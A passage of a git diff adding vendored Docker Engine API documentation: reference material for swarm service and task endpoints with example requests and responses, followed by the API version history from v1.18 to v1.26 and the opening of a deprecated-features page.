+ - **Image** – A string specifying the image name to use for the container. + - **Command** – The command to be run in the image. + - **Args** – Arguments to the command. + - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`. + - **Dir** – A string specifying the working directory for commands to run in. + - **User** – A string value specifying the user inside the container. + - **Labels** – A map of labels to associate with the service (e.g., + `{"key":"value", "key2":"value2"}`). + - **Mounts** – Specification for mounts to be added to containers + created as part of the service. + - **Target** – Container path. + - **Source** – Mount source (e.g. a volume name, a host path). + - **Type** – The mount type (`bind`, or `volume`). + - **ReadOnly** – A boolean indicating whether the mount should be read-only. + - **BindOptions** - Optional configuration for the `bind` type. + - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`. + - **VolumeOptions** – Optional configuration for the `volume` type. + - **NoCopy** – A boolean indicating if volume should be + populated with the data from the target. (Default false) + - **Labels** – User-defined name and labels for the volume. + - **DriverConfig** – Map of driver-specific options. + - **Name** - Name of the driver to use to create the volume. + - **Options** - key/value map of driver specific options. + - **StopGracePeriod** – Amount of time to wait for the container to terminate before + forcefully killing it. + - **LogDriver** - Log configuration for containers created as part of the + service. + - **Name** - Name of the logging driver to use (`json-file`, `syslog`, + `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`). + - **Options** - Driver-specific options. + - **Resources** – Resource requirements which apply to each individual container created as part + of the service. + - **Limits** – Define resources limits. 
+ - **NanoCPUs** – CPU limit in units of 10^-9 CPU shares. + - **MemoryBytes** – Memory limit in Bytes. + - **Reservation** – Define resources reservation. + - **NanoCPUs** – CPU reservation in units of 10^-9 CPU shares. + - **MemoryBytes** – Memory reservation in Bytes. + - **RestartPolicy** – Specification for the restart policy which applies to containers created + as part of this service. + - **Condition** – Condition for restart (`none`, `on-failure`, or `any`). + - **Delay** – Delay between restart attempts. + - **MaxAttempts** – Maximum attempts to restart a given container before giving up (default value + is 0, which is ignored). + - **Window** – Window is the time window used to evaluate the restart policy (default value is + 0, which is unbounded). + - **Placement** – Restrictions on where a service can run. + - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`. +- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`). +- **UpdateConfig** – Specification for the update strategy of the service. + - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited + parallelism). + - **Delay** – Amount of time between updates. + - **FailureAction** - Action to take if an updated task fails to run, or stops running during the + update. Values are `continue` and `pause`. +- **Networks** – Array of network names or IDs to attach the service to. +- **EndpointSpec** – Properties that can be configured to access and load balance a service. + - **Mode** – The mode of resolution to use for internal load balancing + between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided. + - **Ports** – List of exposed ports that this service is accessible on from + the outside, in the form of: + `{"Protocol": <"tcp"|"udp">, "PublishedPort": <PublishedPort>, "TargetPort": <TargetPort>}`. + Ports can only be provided if `vip` resolution mode is used. 
+ +**Request Headers**: + +- **Content-type** – Set to `"application/json"`. +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either + login information, or a token. Refer to the [create an image](#create-an-image) + section for more details. + + +#### Remove a service + + +`DELETE /services/(id or name)` + +Stop and remove the service `id` + +**Example request**: + + DELETE /v1.24/services/16253994b7c4 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Status codes**: + +- **200** – no error +- **404** – no such service +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect one or more services + + +`GET /services/(id or name)` + +Return information on the service `id`. + +**Example request**: + + GET /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha HTTP/1.1 + +**Example response**: + + { + "ID": "ak7w3gjqoa3kuz8xcpnyy0pvl", + "Version": { + "Index": 95 + }, + "CreatedAt": "2016-06-07T21:10:20.269723157Z", + "UpdatedAt": "2016-06-07T21:10:20.276301259Z", + "Spec": { + "Name": "redis", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + } + }, + "Endpoint": { + "Spec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + }, + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ], + "VirtualIPs": [ + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.4/16" + } + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no 
such service +- **406** - node is not part of a swarm +- **500** – server error + +#### Update a service + +`POST /services/(id or name)/update` + +Update a service. When using this endpoint to create a service using a +private repository from the registry, the `X-Registry-Auth` header can be used +to update the authentication information for that is stored for the service. +The header contains a base64-encoded AuthConfig object. Refer to the [create an +image](#create-an-image) section for more details. + +**Example request**: + + POST /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha/update?version=23 HTTP/1.1 + Content-Type: application/json + + { + "Name": "top", + "TaskTemplate": { + "ContainerSpec": { + "Image": "busybox", + "Args": [ + "top" + ] + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1 + }, + "EndpointSpec": { + "Mode": "vip" + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**JSON Parameters**: + +- **Name** – User-defined name for the service. Note that renaming services is not supported. +- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`). +- **TaskTemplate** – Specification of the tasks to start as part of the new service. + - **ContainerSpec** - Container settings for containers started as part of this task. + - **Image** – A string specifying the image name to use for the container. + - **Command** – The command to be run in the image. + - **Args** – Arguments to the command. + - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`. + - **Dir** – A string specifying the working directory for commands to run in. + - **User** – A string value specifying the user inside the container. 
+ - **Labels** – A map of labels to associate with the service (e.g., + `{"key":"value", "key2":"value2"}`). + - **Mounts** – Specification for mounts to be added to containers created as part of the new + service. + - **Target** – Container path. + - **Source** – Mount source (e.g. a volume name, a host path). + - **Type** – The mount type (`bind`, or `volume`). + - **ReadOnly** – A boolean indicating whether the mount should be read-only. + - **BindOptions** - Optional configuration for the `bind` type + - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`. + - **VolumeOptions** – Optional configuration for the `volume` type. + - **NoCopy** – A boolean indicating if volume should be + populated with the data from the target. (Default false) + - **Labels** – User-defined name and labels for the volume. + - **DriverConfig** – Map of driver-specific options. + - **Name** - Name of the driver to use to create the volume + - **Options** - key/value map of driver specific options + - **StopGracePeriod** – Amount of time to wait for the container to terminate before + forcefully killing it. + - **Resources** – Resource requirements which apply to each individual container created as part + of the service. + - **Limits** – Define resources limits. + - **CPU** – CPU limit + - **Memory** – Memory limit + - **Reservation** – Define resources reservation. + - **CPU** – CPU reservation + - **Memory** – Memory reservation + - **RestartPolicy** – Specification for the restart policy which applies to containers created + as part of this service. + - **Condition** – Condition for restart (`none`, `on-failure`, or `any`). + - **Delay** – Delay between restart attempts. + - **MaxAttempts** – Maximum attempts to restart a given container before giving up (default value + is 0, which is ignored). + - **Window** – Window is the time window used to evaluate the restart policy (default value is + 0, which is unbounded). 
+ - **Placement** – Restrictions on where a service can run. + - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`. +- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`). +- **UpdateConfig** – Specification for the update strategy of the service. + - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited + parallelism). + - **Delay** – Amount of time between updates. +- **Networks** – Array of network names or IDs to attach the service to. +- **EndpointSpec** – Properties that can be configured to access and load balance a service. + - **Mode** – The mode of resolution to use for internal load balancing + between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided. + - **Ports** – List of exposed ports that this service is accessible on from + the outside, in the form of: + `{"Protocol": <"tcp"|"udp">, "PublishedPort": , "TargetPort": }`. + Ports can only be provided if `vip` resolution mode is used. + +**Query parameters**: + +- **version** – The version number of the service object being updated. This is + required to avoid conflicting writes. + +**Request Headers**: + +- **Content-type** – Set to `"application/json"`. +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either + login information, or a token. Refer to the [create an image](#create-an-image) + section for more details. + +**Status codes**: + +- **200** – no error +- **404** – no such service +- **406** - node is not part of a swarm +- **500** – server error + +### 3.10 Tasks + +**Note**: Task operations require the engine to be part of a swarm. 
+ +#### List tasks + + +`GET /tasks` + +List tasks + +**Example request**: + + GET /v1.24/tasks HTTP/1.1 + +**Example response**: + + [ + { + "ID": "0kzzo1i0y4jz6027t0k7aezc7", + "Version": { + "Index": 71 + }, + "CreatedAt": "2016-06-07T21:07:31.171892745Z", + "UpdatedAt": "2016-06-07T21:07:31.376370513Z", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:31.290032978Z", + "State": "running", + "Message": "started", + "ContainerStatus": { + "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035", + "PID": 677 + } + }, + "DesiredState": "running", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.10/16" + ] + } + ], + }, + { + "ID": "1yljwbmlr8er2waf8orvqpwms", + "Version": { + "Index": 30 + }, + "CreatedAt": "2016-06-07T21:07:30.019104782Z", + "UpdatedAt": "2016-06-07T21:07:30.231958098Z", + "Name": "hopeful_cori", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": 
{ + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:30.202183143Z", + "State": "shutdown", + "Message": "shutdown", + "ContainerStatus": { + "ContainerID": "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213" + } + }, + "DesiredState": "shutdown", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.5/16" + ] + } + ] + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + services list. 
Available filters: + - `id=` + - `name=` + - `service=` + - `node=` + - `label=key` or `label="key=value"` + - `desired-state=(running | shutdown | accepted)` + +**Status codes**: + +- **200** – no error +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect a task + + +`GET /tasks/(id)` + +Get details on the task `id` + +**Example request**: + + GET /v1.24/tasks/0kzzo1i0y4jz6027t0k7aezc7 HTTP/1.1 + +**Example response**: + + { + "ID": "0kzzo1i0y4jz6027t0k7aezc7", + "Version": { + "Index": 71 + }, + "CreatedAt": "2016-06-07T21:07:31.171892745Z", + "UpdatedAt": "2016-06-07T21:07:31.376370513Z", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:31.290032978Z", + "State": "running", + "Message": "started", + "ContainerStatus": { + "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035", + "PID": 677 + } + }, + "DesiredState": "running", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.10/16" + ] + } + ] + } + +**Status 
codes**: + +- **200** – no error +- **404** – unknown task +- **406** - node is not part of a swarm +- **500** – server error + +## 4. Going further + +### 4.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 4.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 4.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/version-history.md b/vendor/github.com/docker/docker/docs/api/version-history.md new file mode 100644 index 0000000000..4363cfbd74 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/version-history.md @@ -0,0 +1,249 @@ +--- +title: "Engine API version history" +description: "Documentation of changes that have been made to Engine API." 
+keywords: "API, Docker, rcli, REST, documentation" +--- + + + +## v1.26 API changes + +[Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation + +* `POST /plugins/(plugin name)/upgrade` upgrade a plugin. + +## v1.25 API changes + +[Docker Engine API v1.25](https://docs.docker.com/engine/api/v1.25/) documentation + +* The API version is now required in all API calls. Instead of just requesting, for example, the URL `/containers/json`, you must now request `/v1.25/containers/json`. +* `GET /version` now returns `MinAPIVersion`. +* `POST /build` accepts `networkmode` parameter to specify network used during build. +* `GET /images/(name)/json` now returns `OsVersion` if populated +* `GET /info` now returns `Isolation`. +* `POST /containers/create` now takes `AutoRemove` in HostConfig, to enable auto-removal of the container on daemon side when the container's process exits. +* `GET /containers/json` and `GET /containers/(id or name)/json` now return `"removing"` as a value for the `State.Status` field if the container is being removed. Previously, "exited" was returned as status. +* `GET /containers/json` now accepts `removing` as a valid value for the `status` filter. +* `GET /containers/json` now supports filtering containers by `health` status. +* `DELETE /volumes/(name)` now accepts a `force` query parameter to force removal of volumes that were already removed out of band by the volume driver plugin. +* `POST /containers/create/` and `POST /containers/(name)/update` now validates restart policies. +* `POST /containers/create` now validates IPAMConfig in NetworkingConfig, and returns error for invalid IPv4 and IPv6 addresses (`--ip` and `--ip6` in `docker create/run`). +* `POST /containers/create` now takes a `Mounts` field in `HostConfig` which replaces `Binds`, `Volumes`, and `Tmpfs`. *note*: `Binds`, `Volumes`, and `Tmpfs` are still available and can be combined with `Mounts`. 
+* `POST /build` now performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. Note that this change is _unversioned_ and applied to all API versions. +* `POST /build` accepts `cachefrom` parameter to specify images used for build cache. +* `GET /networks/` endpoint now correctly returns a list of *all* networks, + instead of the default network if a trailing slash is provided, but no `name` + or `id`. +* `DELETE /containers/(name)` endpoint now returns an error of `removal of container name is already in progress` with status code of 400, when container name is in a state of removal in progress. +* `GET /containers/json` now supports a `is-task` filter to filter + containers that are tasks (part of a service in swarm mode). +* `POST /containers/create` now takes `StopTimeout` field. +* `POST /services/create` and `POST /services/(id or name)/update` now accept `Monitor` and `MaxFailureRatio` parameters, which control the response to failures during service updates. +* `POST /services/(id or name)/update` now accepts a `ForceUpdate` parameter inside the `TaskTemplate`, which causes the service to be updated even if there are no changes which would ordinarily trigger an update. +* `POST /services/create` and `POST /services/(id or name)/update` now return a `Warnings` array. +* `GET /networks/(name)` now returns field `Created` in response to show network created time. +* `POST /containers/(id or name)/exec` now accepts an `Env` field, which holds a list of environment variables to be set in the context of the command execution. +* `GET /volumes`, `GET /volumes/(name)`, and `POST /volumes/create` now return the `Options` field which holds the driver specific options to use for when creating the volume. +* `GET /exec/(id)/json` now returns `Pid`, which is the system pid for the exec'd process. +* `POST /containers/prune` prunes stopped containers. +* `POST /images/prune` prunes unused images. 
+* `POST /volumes/prune` prunes unused volumes. +* `POST /networks/prune` prunes unused networks. +* Every API response now includes a `Docker-Experimental` header specifying if experimental features are enabled (value can be `true` or `false`). +* Every API response now includes an `API-Version` header specifying the default API version of the server. +* The `hostConfig` option now accepts the fields `CpuRealtimePeriod` and `CpuRtRuntime` to allocate cpu runtime to rt tasks when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel. +* The `SecurityOptions` field within the `GET /info` response now includes `userns` if user namespaces are enabled in the daemon. +* `GET /nodes` and `GET /node/(id or name)` now return `Addr` as part of a node's `Status`, which is the address that that node connects to the manager from. +* The `HostConfig` field now includes `NanoCPUs` that represents CPU quota in units of 10^-9 CPUs. +* `GET /info` now returns more structured information about security options. +* The `HostConfig` field now includes `CpuCount` that represents the number of CPUs available for execution by the container. Windows daemon only. +* `POST /services/create` and `POST /services/(id or name)/update` now accept the `TTY` parameter, which allocates a pseudo-TTY in container. +* `POST /services/create` and `POST /services/(id or name)/update` now accept the `DNSConfig` parameter, which specifies DNS related configurations in resolver configuration file (resolv.conf) through `Nameservers`, `Search`, and `Options`. +* `GET /networks/(id or name)` now includes IP and name of all peer nodes for swarm mode overlay networks. +* `GET /plugins` list plugins. +* `POST /plugins/pull?name=` pulls a plugin. +* `GET /plugins/(plugin name)` inspect a plugin. +* `POST /plugins/(plugin name)/set` configure a plugin. +* `POST /plugins/(plugin name)/enable` enable a plugin. +* `POST /plugins/(plugin name)/disable` disable a plugin. +* `POST /plugins/(plugin name)/push` push a plugin. 
+* `POST /plugins/create?name=(plugin name)` create a plugin. +* `DELETE /plugins/(plugin name)` delete a plugin. +* `POST /node/(id or name)/update` now accepts both `id` or `name` to identify the node to update. +* `GET /images/json` now support a `reference` filter. +* `GET /secrets` returns information on the secrets. +* `POST /secrets/create` creates a secret. +* `DELETE /secrets/{id}` removes the secret `id`. +* `GET /secrets/{id}` returns information on the secret `id`. +* `POST /secrets/{id}/update` updates the secret `id`. + +## v1.24 API changes + +[Docker Engine API v1.24](v1.24.md) documentation + +* `POST /containers/create` now takes `StorageOpt` field. +* `GET /info` now returns `SecurityOptions` field, showing if `apparmor`, `seccomp`, or `selinux` is supported. +* `GET /info` no longer returns the `ExecutionDriver` property. This property was no longer used after integration + with ContainerD in Docker 1.11. +* `GET /networks` now supports filtering by `label` and `driver`. +* `GET /containers/json` now supports filtering containers by `network` name or id. +* `POST /containers/create` now takes `IOMaximumBandwidth` and `IOMaximumIOps` fields. Windows daemon only. +* `POST /containers/create` now returns an HTTP 400 "bad parameter" message + if no command is specified (instead of an HTTP 500 "server error") +* `GET /images/search` now takes a `filters` query parameter. +* `GET /events` now supports a `reload` event that is emitted when the daemon configuration is reloaded. +* `GET /events` now supports filtering by daemon name or ID. +* `GET /events` now supports a `detach` event that is emitted on detaching from container process. +* `GET /events` now supports an `exec_detach ` event that is emitted on detaching from exec process. +* `GET /images/json` now supports filters `since` and `before`. +* `POST /containers/(id or name)/start` no longer accepts a `HostConfig`. +* `POST /images/(name)/tag` no longer has a `force` query parameter. 
+* `GET /images/search` now supports maximum returned search results `limit`. +* `POST /containers/{name:.*}/copy` is now removed and errors out starting from this API version. +* API errors are now returned as JSON instead of plain text. +* `POST /containers/create` and `POST /containers/(id)/start` allow you to configure kernel parameters (sysctls) for use in the container. +* `POST /containers//exec` and `POST /exec//start` + no longer expects a "Container" field to be present. This property was not used + and is no longer sent by the docker client. +* `POST /containers/create/` now validates the hostname (should be a valid RFC 1123 hostname). +* `POST /containers/create/` `HostConfig.PidMode` field now accepts `container:`, + to have the container join the PID namespace of an existing container. + +## v1.23 API changes + +[Docker Engine API v1.23](v1.23.md) documentation + +* `GET /containers/json` returns the state of the container, one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`. +* `GET /containers/json` returns the mount points for the container. +* `GET /networks/(name)` now returns an `Internal` field showing whether the network is internal or not. +* `GET /networks/(name)` now returns an `EnableIPv6` field showing whether the network has ipv6 enabled or not. +* `POST /containers/(name)/update` now supports updating container's restart policy. +* `POST /networks/create` now supports enabling ipv6 on the network by setting the `EnableIPv6` field (doing this with a label will no longer work). +* `GET /info` now returns `CgroupDriver` field showing what cgroup driver the daemon is using; `cgroupfs` or `systemd`. +* `GET /info` now returns `KernelMemory` field, showing if "kernel memory limit" is supported. +* `POST /containers/create` now takes `PidsLimit` field, if the kernel is >= 4.3 and the pids cgroup is supported. 
+* `GET /containers/(id or name)/stats` now returns `pids_stats`, if the kernel is >= 4.3 and the pids cgroup is supported. +* `POST /containers/create` now allows you to override usernamespaces remapping and use privileged options for the container. +* `POST /containers/create` now allows specifying `nocopy` for named volumes, which disables automatic copying from the container path to the volume. +* `POST /auth` now returns an `IdentityToken` when supported by a registry. +* `POST /containers/create` with both `Hostname` and `Domainname` fields specified will result in the container's hostname being set to `Hostname`, rather than `Hostname.Domainname`. +* `GET /volumes` now supports more filters, new added filters are `name` and `driver`. +* `GET /containers/(id or name)/logs` now accepts a `details` query parameter to stream the extra attributes that were provided to the containers `LogOpts`, such as environment variables and labels, with the logs. +* `POST /images/load` now returns progress information as a JSON stream, and has a `quiet` query parameter to suppress progress details. + +## v1.22 API changes + +[Docker Engine API v1.22](v1.22.md) documentation + +* `POST /container/(name)/update` updates the resources of a container. +* `GET /containers/json` supports filter `isolation` on Windows. +* `GET /containers/json` now returns the list of networks of containers. +* `GET /info` Now returns `Architecture` and `OSType` fields, providing information + about the host architecture and operating system type that the daemon runs on. +* `GET /networks/(name)` now returns a `Name` field for each container attached to the network. +* `GET /version` now returns the `BuildTime` field in RFC3339Nano format to make it + consistent with other date/time values returned by the API. 
+* `AuthConfig` now supports a `registrytoken` for token based authentication +* `POST /containers/create` now has a 4M minimum value limit for `HostConfig.KernelMemory` +* Pushes initiated with `POST /images/(name)/push` and pulls initiated with `POST /images/create` + will be cancelled if the HTTP connection making the API request is closed before + the push or pull completes. +* `POST /containers/create` now allows you to set a read/write rate limit for a + device (in bytes per second or IO per second). +* `GET /networks` now supports filtering by `name`, `id` and `type`. +* `POST /containers/create` now allows you to set the static IPv4 and/or IPv6 address for the container. +* `POST /networks/(id)/connect` now allows you to set the static IPv4 and/or IPv6 address for the container. +* `GET /info` now includes the number of containers running, stopped, and paused. +* `POST /networks/create` now supports restricting external access to the network by setting the `Internal` field. +* `POST /networks/(id)/disconnect` now includes a `Force` option to forcefully disconnect a container from network +* `GET /containers/(id)/json` now returns the `NetworkID` of containers. +* `POST /networks/create` Now supports an options field in the IPAM config that provides options + for custom IPAM plugins. +* `GET /networks/{network-id}` Now returns IPAM config options for custom IPAM plugins if any + are available. +* `GET /networks/` now returns subnets info for user-defined networks. +* `GET /info` can now return a `SystemStatus` field useful for returning additional information about applications + that are built on top of engine. + +## v1.21 API changes + +[Docker Engine API v1.21](v1.21.md) documentation + +* `GET /volumes` lists volumes from all volume drivers. +* `POST /volumes/create` to create a volume. +* `GET /volumes/(name)` get low-level information about a volume. +* `DELETE /volumes/(name)` remove a volume with the specified name. 
+* `VolumeDriver` was moved from `config` to `HostConfig` to make the configuration portable. +* `GET /images/(name)/json` now returns information about an image's `RepoTags` and `RepoDigests`. +* The `config` option now accepts the field `StopSignal`, which specifies the signal to use to kill a container. +* `GET /containers/(id)/stats` will return networking information respectively for each interface. +* The `HostConfig` option now includes the `DnsOptions` field to configure the container's DNS options. +* `POST /build` now optionally takes a serialized map of build-time variables. +* `GET /events` now includes a `timenano` field, in addition to the existing `time` field. +* `GET /events` now supports filtering by image and container labels. +* `GET /info` now lists engine version information and return the information of `CPUShares` and `Cpuset`. +* `GET /containers/json` will return `ImageID` of the image used by container. +* `POST /exec/(name)/start` will now return an HTTP 409 when the container is either stopped or paused. +* `POST /containers/create` now takes `KernelMemory` in HostConfig to specify kernel memory limit. +* `GET /containers/(name)/json` now accepts a `size` parameter. Setting this parameter to '1' returns container size information in the `SizeRw` and `SizeRootFs` fields. +* `GET /containers/(name)/json` now returns a `NetworkSettings.Networks` field, + detailing network settings per network. This field deprecates the + `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`, + `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which + are still returned for backward-compatibility, but will be removed in a future version. +* `GET /exec/(id)/json` now returns a `NetworkSettings.Networks` field, + detailing networksettings per network. 
This field deprecates the + `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`, + `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which + are still returned for backward-compatibility, but will be removed in a future version. +* The `HostConfig` option now includes the `OomScoreAdj` field for adjusting the + badness heuristic. This heuristic selects which processes the OOM killer kills + under out-of-memory conditions. + +## v1.20 API changes + +[Docker Engine API v1.20](v1.20.md) documentation + +* `GET /containers/(id)/archive` get an archive of filesystem content from a container. +* `PUT /containers/(id)/archive` upload an archive of content to be extracted to +an existing directory inside a container's filesystem. +* `POST /containers/(id)/copy` is deprecated in favor of the above `archive` +endpoint which can be used to download files and directories from a container. +* The `hostConfig` option now accepts the field `GroupAdd`, which specifies a +list of additional groups that the container process will run as. + +## v1.19 API changes + +[Docker Engine API v1.19](v1.19.md) documentation + +* When the daemon detects a version mismatch with the client, usually when +the client is newer than the daemon, an HTTP 400 is now returned instead +of a 404. +* `GET /containers/(id)/stats` now accepts `stream` bool to get only one set of stats and disconnect. +* `GET /containers/(id)/logs` now accepts a `since` timestamp parameter. +* `GET /info` The fields `Debug`, `IPv4Forwarding`, `MemoryLimit`, and +`SwapLimit` are now returned as boolean instead of as an int. In addition, the +end point now returns the new boolean fields `CpuCfsPeriod`, `CpuCfsQuota`, and +`OomKillDisable`. 
+* The `hostConfig` option now accepts the fields `CpuPeriod` and `CpuQuota` +* `POST /build` accepts `cpuperiod` and `cpuquota` options + +## v1.18 API changes + +[Docker Engine API v1.18](v1.18.md) documentation + +* `GET /version` now returns `Os`, `Arch` and `KernelVersion`. +* `POST /containers/create` and `POST /containers/(id)/start` allow you to set ulimit settings for use in the container. +* `GET /info` now returns `SystemTime`, `HttpProxy`, `HttpsProxy` and `NoProxy`. +* `GET /images/json` added a `RepoDigests` field to include image digest information. +* `POST /build` can now set resource constraints for all containers created for the build. +* `CgroupParent` can be passed in the host config to set up container cgroups under a specific cgroup. +* `POST /build` closing the HTTP request cancels the build +* `POST /containers/(id)/exec` includes `Warnings` field to response. diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md new file mode 100644 index 0000000000..1298370ba9 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/deprecated.md @@ -0,0 +1,286 @@ +--- +aliases: ["/engine/misc/deprecated/"] +title: "Deprecated Engine Features" +description: "Deprecated Features." +keywords: "docker, documentation, about, technology, deprecate" +--- + + + +# Deprecated Engine Features + +The following list of features is deprecated in Engine. +To learn more about Docker Engine's deprecation policy, +see 